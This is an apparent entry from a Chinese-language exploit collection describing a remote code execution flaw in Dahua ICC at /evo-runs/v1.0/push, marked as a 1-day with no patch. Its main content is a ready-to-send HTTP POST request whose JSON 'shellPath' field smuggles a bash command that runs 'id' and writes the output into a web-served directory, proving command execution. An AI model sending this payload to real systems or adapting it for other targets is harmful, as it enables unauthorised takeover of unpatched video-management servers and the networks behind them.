vendor = "大华"
name = "大华icc /evo-runs/v1.0/push RCE"
type = "RCE"
version = "未知"
path = "/evo-runs/v1.0/push"
detail = "POST /evo-runs/v1.0/push HTTP/2 Host: xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Content-Type: application/json X-Subject-Headerflag: ADAPT Content-Length: 301 { \"method\": \"agent.ossm.mapping.config\", \"info\": { \"configure\": \"cc\", \"filePath\": \"cc\", \"paramMap\": { \"shellPath\": \"/bin/bash -c id>/opt/evoWpms/static/cc.txt\", \"filePath\": \"cc\" }, \"requestIp\": \"\" }}"
fix = "暂无补丁"
date = "0715"
label = "1day"
verifier = "AdySec"
